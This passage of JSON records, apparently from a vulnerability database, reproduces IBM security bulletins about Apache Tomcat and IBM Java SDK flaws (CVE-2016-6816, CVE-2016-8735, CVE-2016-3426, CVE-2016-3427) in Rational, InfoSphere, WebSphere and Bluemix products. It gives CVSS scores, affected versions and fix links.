"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T15:23:24", "id": "E095FC03096261FE55986EF4F402EA0A700BEE11F22BFA669379C13D2E1BC33B", "href": "https://www.ibm.com/support/pages/node/279195", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:35", "description": "## Summary\n\nThe Rational Reporting for Development Intelligence (RRDI) is shipped with a version of the Apache Tomcat web server which contains security vulnerabilities that could have a potential security impact.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119158> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n\n**CVEID:** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119157> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nRRDI 2.0, 2.0.1, 2.0.3 and 2.0.4| Cognos BI 10.1.1 \nRRDI 2.0.5 and 2.0.6| Cognos BI 10.2.1 \nRRDI 5.0, 5.0.1 and 5.0.2| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 5.0, 5.0.1 and 5.0.2 \n \n## Remediation/Fixes\n\n \nApply the recommended fixes to all affected versions of RRDI. \n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**RRDI 2.0, 2.0.0.1, 2.0.1, 2.0.3 and 2.0.4** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 21 (Implemented by file 10.1.6306.520)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043287>). \nReview technote [1679281: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Reporting for Development Intelligence 2.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679281>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**RRDI 2.0.5 and 2.0.6 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.2.1 Interim Fix 19 (Implemented by file 10.2.5000.537)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043288>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n**RRDI 5.0 and 5.0.1 and 5.0.2 ** \n \n\n\n 1. If the Data Collection Component (DCC) or Jazz Reporting Service (JRS, also known as Report Builder) is used, perform this step first. \nReview the topics in [Security Bulletin: Multiple security vulnerabilities have been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-6816,CVE-2016-8735)](<http://www-01.ibm.com/support/docview.wss?uid=swg21996898>) for addressing the listed vulnerability in the underlying Jazz Team Server. \n\n 2. If the Cognos-based reporting server is used, also perform this step. \nDownload the [IBM Cognos Business Intelligence 10.2.1.1 Interim Fix 18 (Implemented by file 10.2.5012.504)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043288>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:19:05", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities in Apache Tomcat affect Rational Reporting for Development Intelligence (CVE-2016-6816, CVE-2016-8735)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2018-06-17T05:19:05", "id": "D28A33DD6F9F0616BF17BE9435C16BA5747AE3606D1B535CC4C8068BCF7BF4EB", "href": "https://www.ibm.com/support/pages/node/289763", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:48:34", "description": "## Summary\n\nJazz Team Server is shipped as a component of Jazz Reporting Service (JRS). Information about multiple security vulnerabilities affecting Jazz Team Server and Jazz-based products has been published in a security bulletin. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119158> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n\n**CVEID:** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119157> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nJRS 5.0, 5.0.1, 5.0.2| Jazz Foundation 5.0, 5.0.1, 5.0.2 \nJRS 6.0, 6.0.1, 6.0.2, 6.0.3| Jazz Foundation 6.0, 6.0.1, 6.0.2, 6.0.3 \n* Both JRS and Jazz Foundation are part of Rational Collaborative Lifecycle Management. \n\n## Remediation/Fixes\n\n \nConsult the security bulletin [Security Bulletin: Security vulnerabilities in Apache Tomcat affects multiple IBM Rational products based on IBM's Jazz technology](<https://www-01.ibm.com/support/docview.wss?uid=swg21997084>) for vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:18:54", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-6816,CVE-2016-8735)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2018-06-17T05:18:54", "id": "B0917B9B05986D5C57AFA7D61D59DB3AC46BF8A66810DCCC331CD59E3A0CC975", "href": "https://www.ibm.com/support/pages/node/289075", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:51:47", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition, Versions 6 and 7 that are used by IBM InfoSphere Information Server. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3 and 11.5\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nInfoSphere Information Server| 11.5| JR55811| \\--Follow instructions in the [_README_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is115_JR55811_ISF_services_engine_*>) \nInfoSphere Information Server| 11.3| JR55811| \\--Follow instructions in the [_README_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is113_JR55811_ISF_services_engine_*>) \nInfoSphere Information Server| 9.1| JR55811| \\--Apply [_JR55811_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is91_JR55811_ISF_services_engine*>) on all tiers \nInfoSphere Information Server| 8.7| JR55811| \\--Apply IBM InfoSphere Information Server version [_8.7 Fix Pack 2_](<http://www-01.ibm.com/support/docview.wss?uid=swg24034359>) \n\\--Apply [_JR55811_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8702_JR55811_ISF_services_engine*>) on all tiers \nInfoSphere Information Server| 8.5| JR55811| \\--Apply IBM InfoSphere Information Server version [_8.5 Fix Pack 3_](<http://www-01.ibm.com/support/docview.wss?uid=swg24033513>) \n\\--Apply [_JR55811_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8503_JR55811_ISF_services_engine*>) on all tiers \n \nFor IBM InfoSphere Information Server version 8.1, IBM recommends upgrading to a fixed, supported version/release/platform of the product. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T14:08:19", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM InfoSphere Information Server (CVE-2016-3426 CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-16T14:08:19", "id": "ACF0F1F92955D253FE8D9A17FABBDE19665D165C1026886A0612F8B6186AA5A2", "href": "https://www.ibm.com/support/pages/node/283951", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:16", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition that is shipped with IBM WebSphere Application Server. These issues were disclosed in the Oracle April 2016 Critical Patch Update, plus four additional vulnerabilities. These may affect some configurations of Liberty for Java for IBM Bluemix. \n\n## Vulnerability Details\n\nThis bulletin covers all applicable Java SE CVEs published by Oracle as part of their April 2016 Critical Patch Update which affects IBM SDK, Java Technology Edition. There are other advisories included in the IBM Java SDK but Liberty for Java for IBM Bluemix is not vulnerable to them. You will need to evaluate your own code to determine if you are vulnerable. Please refer to the Reference section for more information on the advisories not applicable to Liberty for Java for IBM Bluemix. ** \nCVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n** \nCVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n\n## Affected Products and Versions\n\nThis vulnerability affects all versions of Liberty for Java in IBM Bluemix up to and including v2.7.\n\n## Remediation/Fixes\n\nTo upgrade to Liberty for Java v2.8-20160430-1011 or higher, you must re-stage or re-push your application. To check which version of the Liberty for Java runtime your Bluemix application is using, navigate to the \"Files\" menu item for your application through the Bluemix UI. In the \"logs\" directory, check the \"staging_task.log\". \n \nYou can also find this file through the command-line Cloud Foundry client by running the following command: \n \n**cf files <appname> logs/staging_task.log** \n \nYou can see \n \n\\-----> Liberty Buildpack Version: _________ \n \nTo re-stage your application using the command-line Cloud Foundry client, use the following command: \n \n**cf restage <appname>** \n \nTo re-push your application using the command-line Cloud Foundry client, use the following command: \n \n**cf push <appname>**\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:36", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect Liberty for Java for IBM Bluemix April 2016 CPU (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:36", "id": "4D0056EC4D5672FF48E356CFCC82780C64C9FB240D745F2F627F178D9CF22F0C", "href": "https://www.ibm.com/support/pages/node/278617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:15", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Versions 6 and 7 that are used by WebSphere eXtreme Scale. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nWebSphere eXtreme Scale 7.1.0 \n\nWebSphere eXtreme Scale 7.1.1\n\nWebSphere eXtreme Scale 8.5\n\nWebSphere eXtreme Scale 8.6\n\n## Remediation/Fixes\n\nSince MD5 signatures are no longer compatible with Java, installing this interim fix will make it incompatible with any WebSphere eXtreme Scale clients and servers that are running with an MD5 certificate. If any WebSphere eXtreme Scale clients or servers are configured with a certificate with an MD5 signature, they must be replaced prior to starting after upgrading to this interim fix. Failing to do so will result in the clients and servers failing to connect to each other. Note that client truststores must be configured to trust the new certificate. \n \n\n\n_<Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_WebSphere eXtreme Scale_| 7.1| PI62225 | Refer to the **Version 7.1** table in the [Recommended Fixes page for WebSphere eXtreme Scale](<http://www-01.ibm.com/support/docview.wss?uid=swg27018991>). \n_WebSphere eXtreme Scale_| 7.1.1 \n\n8.5\n\n8.6\n\n| PI62255 | Refer to the **Version 7.1.1**, **8.5**, or **8.6** table in the [Recommended Fixes page for WebSphere eXtreme Scale](<http://www-01.ibm.com/support/docview.wss?uid=swg27018991>). \n \n## Workarounds and Mitigations\n\nNo workaround exists. If you are running WebSphere eXtreme Scale standalone, apply the appropriate fix from the previous table. If you are running WebSphere eXtreme Scale clients or servers that are embedded in WebSphere Application Server, apply the appropriate fix for WebSphere Application Server, which is described here: **_<https://www-304.ibm.com/support/docview.wss?uid=swg21962931>_**\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:37", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere eXtreme Scale (CVE-2016-3427, CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:37", "id": "3685A36D136086CBDF1C072E6BE9AD83DCB1C185CE82F5183E3DE098D0CF7921", "href": "https://www.ibm.com/support/pages/node/278783", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T23:34:48", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Service Registry and Repository. Information about security vulnerabilities affecting WebSphere Application Server have been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [WebSphere Application Server](<http://www.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrinciple Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nWebSphere Service Registry and Repository V8.5| WebSphere Application Server Network Deployment V8.5.5 \nWebSphere Service Registry and Repository V8.0| WebSphere Application Server Network Deployment V8.0 \nWebSphere Service Registry and Repository V7.5| WebSphere Application Server Network Deployment V7.0 \nWebSphere Service Registry and Repository V7.0| WebSphere Application Server Network Deployment V7.0 \n \n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n## Important Note\n\nIBM strongly suggests that all System z customers be subscribed to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [System z Security web site](<http://www.ibm.com/systems/z/solutions/security_subintegrity.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 June 2016: Original version published \n\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Internal Use Only\n\nTHIS DOCUMENT IS FOR PSIRT PRODUCT RECORD #75913\n\n[{\"Product\":{\"code\":\"SSWLGF\",\"label\":\"WebSphere Service Registry and Repository\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Security\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF035\",\"label\":\"z\\/OS\"}],\"Version\":\"8.5;8.0;7.5;7.0\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {}, "published": "2018-06-15T07:05:52", "type": "ibm", "title": "Multiple vulnerabilities have been identified in WebSphere Application Server shipped with WebSphere Service Registry and Repository (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:52", "id": "435516AF6D5C3AA4A41E050752C520D87248D73515C5F8742AB46F7FEAE2E9A4", "href": "https://www.ibm.com/support/pages/node/281871", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-02T14:37:34", "description": "## Summary\n\nThere is a vulnerability in IBM\u00ae SDK Java Technology Edition, Version 1.6 and 1.7 that are used by IBM Jazz Team Server affecting the following IBM Jazz Team Server based Applications: Collaborative Lifecycle Management (CLM), Rational Requirements Composer (RRC), Rational DOORS Next Generation (RDNG), Rational Engineering Lifecycle Manager (RELM), Rational Team Concert (RTC), Rational Quality Manager (RQM), Rational Rhapsody Design Manager (Rhapsody DM), and Rational Software Architect (RSA DM). These issues were disclosed as part of the IBM Java SDK updates in April 2016. \n\n## Vulnerability Details\n\nIBM Jazz Team Server and the CLM applications (RRC, RTC, RQM, RDNG), RELM, Rhapsody DM, and RSA DM applications are affected by the following vulnerabilities disclosed in and corrected by the IBM\u00ae Java SDK updates in April 2016 : \n \n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nRational Collaborative Lifecycle Management 3.0.1 - 6.0.2 \n \nRational Quality Manager 2.0 - 2.0.1 \nRational Quality Manager 3.0 - 3.0.1.6 \nRational Quality Manager 4.0 - 4.0.7 \nRational Quality Manager 5.0 - 5.0.2 \nRational Quality Manager 6.0 - 6.0.2 \n \nRational Team Concert 2.0 - 2.0.0.2 \nRational Team Concert 3.0 - 3.0.6 \nRational Team Concert 4.0 - 4.0.7 \nRational Team Concert 5.0 - 5.0.2 \nRational Team Concert 6.0 - 6.0.2 \n \nRational Requirements Composer 2.0 - 2.0.0.4 \nRational Requirements Composer 3.0 - 3.0.1.6 \nRational Requirements Composer 4.0 - 4.0.7 \n \nRational DOORS Next Generation 4.0 - 4.0.7 \nRational DOORS Next Generation 5.0 - 5.0.2 \nRational DOORS Next Generation 6.0 - 6.0.2 \n \nRational Engineering Lifecycle Manager 1.0- 1.0.0.1 \nRational Engineering Lifecycle Manager 4.0.3 - 4.0.7 \nRational Engineering Lifecycle Manager 5.0 - 5.0.2 \nRational Engineering Lifecycle Manager 6.0 - 6.0.2 \n \nRational Rhapsody Design Manager 3.0 - 3.0.1 \nRational Rhapsody Design Manager 4.0 - 4.0.7 \nRational Rhapsody Design Manager 5.0 - 5.0.2 \nRational Rhapsody Design Manager 6.0 - 6.0.2 \n \nRational Software Architect Design Manager 3.0 - 3.0.1 \nRational Software Architect Design Manager 4.0 